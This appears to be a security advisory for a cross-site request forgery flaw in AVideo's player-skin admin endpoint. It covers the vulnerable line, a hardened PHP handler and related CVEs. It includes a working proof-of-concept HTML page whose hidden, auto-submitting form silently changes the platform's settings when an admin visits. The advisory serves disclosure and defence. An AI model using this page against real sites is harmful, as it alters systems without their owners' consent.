CVE-2026-35181
PHP vulnerability analysis and mitigation

Severity: Medium
CWE: CWE-352 (Cross-Site Request Forgery)

Summary

The player skin configuration endpoint at admin/playerUpdate.json.php does not validate CSRF tokens. The plugins table is explicitly excluded from the ORM's domain-based security check via ignoreTableSecurityCheck(), removing the only other layer of defense. Combined with SameSite=None cookies, a cross-origin POST can modify the video player appearance on the entire platform.

Details

In admin/playerUpdate.json.php at line 17, the player skin is set directly from POST data:

$pluginDO->skin = $_POST['skin'];

No CSRF token is validated anywhere in the endpoint. Normally, the ORM layer performs a Referer/Origin domain check as a secondary defense against cross-origin writes. However, the plugins table is registered in ignoreTableSecurityCheck(), which explicitly bypasses this ORM-level protection for plugin configuration. AVideo's session cookies are configured with SameSite=None, meaning the admin's authenticated session cookie is automatically included in cross-origin POST requests from any website. An attacker can craft a page that, when visited by an authenticated admin, silently changes the player skin to any value, including potentially invalid or disruptive configurations.

Proof of Concept

Host the following HTML on an attacker-controlled domain:

<!DOCTYPE html>
<html>
<head><title>CSRF Player Skin</title></head>
<body>
<h1>Loading video...</h1>
<!-- Submitting into a hidden iframe keeps the admin on this page, so the
     cross-origin POST happens silently and the JSON response is never shown. -->
<iframe name="sink" style="display:none"></iframe>
<form id="csrf" method="POST" target="sink"
      action="https://your-avideo-instance.com/admin/playerUpdate.json.php">
  <input type="hidden" name="skin" value="minimalist" />
</form>
<script>
  // Auto-submit on load: no click or other user interaction is required.
  document.getElementById("csrf").submit();
</script>
</body>
</html>

When an authenticated admin visits this page, the platform's player skin is changed without their knowledge. The request only succeeds because the browser attaches the session cookie to the cross-site POST; with SameSite=Lax or Strict the cookie would be omitted from a cross-site form POST and the request would arrive unauthenticated.

Impact

  • Platform-wide player appearance modification without admin consent
  • Potential disruption of video playback if an invalid skin value is set
  • The ORM security bypass via ignoreTableSecurityCheck() means there is no fallback protection
  • Can be used as part of a broader defacement or social engineering attack

Mitigation

Add CSRF token validation at admin/playerUpdate.json.php, before processing POST data:

// admin/playerUpdate.json.php (before line 17)
if (!isGlobalTokenValid()) {
    die('{"error":"Invalid CSRF token"}');
}
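The following is an added example, not AVideo's code, showing the hardened shape of the handler described in the Details and Mitigation sections: a per-session CSRF token checked in constant time, the Origin/Referer host check that ignoreTableSecurityCheck() removed, re-added at the endpoint as defense in depth, an allow-list for the skin value, and a SameSite=Lax session cookie. The helper names (issueCsrfToken, isCsrfTokenValid, isOriginAllowed, handlePlayerUpdate, the csrfToken field and the ALLOWED_SKINS list) are assumptions for illustration; in the real project the token check is isGlobalTokenValid(). The requests at the bottom are constructed, so the script runs stand-alone with the PHP CLI.

```php
<?php
// Added example (not AVideo's code). Helper names, the csrfToken field and the
// ALLOWED_SKINS list are assumptions for illustration.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrfToken';
const ALLOWED_SKINS = ['default', 'minimalist']; // hypothetical allow-list

// Step 1: mint one random token per session and render it into every admin form.
function issueCsrfToken(array &$session): string {
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Step 2: compare the submitted token against the session in constant time.
function isCsrfTokenValid(array $session, array $post): bool {
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given = $post['csrfToken'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Step 3: the Origin/Referer host check the ORM would normally perform.
// A request with neither header is rejected rather than assumed same-origin.
function isOriginAllowed(array $server, string $siteHost): bool {
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $header) {
        if (!empty($server[$header])) {
            $host = (string) parse_url((string) $server[$header], PHP_URL_HOST);
            return strcasecmp($host, $siteHost) === 0;
        }
    }
    return false;
}

// Hardened equivalent of:  $pluginDO->skin = $_POST['skin'];
function handlePlayerUpdate(array $session, array $post, array $server, string $siteHost): array {
    if (!isCsrfTokenValid($session, $post)) {
        return ['error' => 'Invalid CSRF token'];
    }
    if (!isOriginAllowed($server, $siteHost)) {
        return ['error' => 'Cross-origin request rejected'];
    }
    $skin = $post['skin'] ?? '';
    if (!is_string($skin) || !in_array($skin, ALLOWED_SKINS, true)) {
        return ['error' => 'Unknown skin'];
    }
    return ['error' => false, 'skin' => $skin]; // safe to persist to the plugins table
}

// Session cookie settings: Lax keeps the cookie out of cross-site POSTs at the
// browser, so even a missing token check would not be reachable cross-site.
function secureSessionCookieParams(): array {
    return ['lifetime' => 0, 'path' => '/', 'domain' => '',
            'secure' => true, 'httponly' => true, 'samesite' => 'Lax'];
}
// In the real application, call this before session_start():
// session_set_cookie_params(secureSessionCookieParams());

// Constructed requests: the PoC's cross-site POST versus a legitimate admin form.
$session = [];
$token = issueCsrfToken($session);
$site = 'your-avideo-instance.com';

$crossSite = handlePlayerUpdate($session, ['skin' => 'minimalist'],
    ['HTTP_ORIGIN' => 'https://attacker.example'], $site);
$legit = handlePlayerUpdate($session, ['skin' => 'minimalist', 'csrfToken' => $token],
    ['HTTP_ORIGIN' => 'https://' . $site], $site);

echo json_encode(['cross_site' => $crossSite, 'legit' => $legit], JSON_PRETTY_PRINT), PHP_EOL;
```

The token check comes first so that an attacker learns nothing about the origin policy from the error message, and the skin allow-list closes the "invalid or disruptive configuration" case independently of CSRF.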

Found by aisafe.io


Source: NVD

Related PHP vulnerabilities:

CVE ID           Severity  Score  Technologies  Component name  CISA KEV exploit  Has fix  Published date
CVE-2026-35452   MEDIUM    5.3    PHP           wwbn/avideo     No                No       Apr 04, 2026
CVE-2026-35450   MEDIUM    5.3    PHP           wwbn/avideo     No                No       Apr 04, 2026
CVE-2026-35449   MEDIUM    5.3    PHP           wwbn/avideo     No                No       Apr 04, 2026
CVE-2026-35181   MEDIUM    4.3    PHP           wwbn/avideo     No                No       Apr 03, 2026
CVE-2026-35448   LOW       3.7    PHP           wwbn/avideo     No                No       Apr 04, 2026
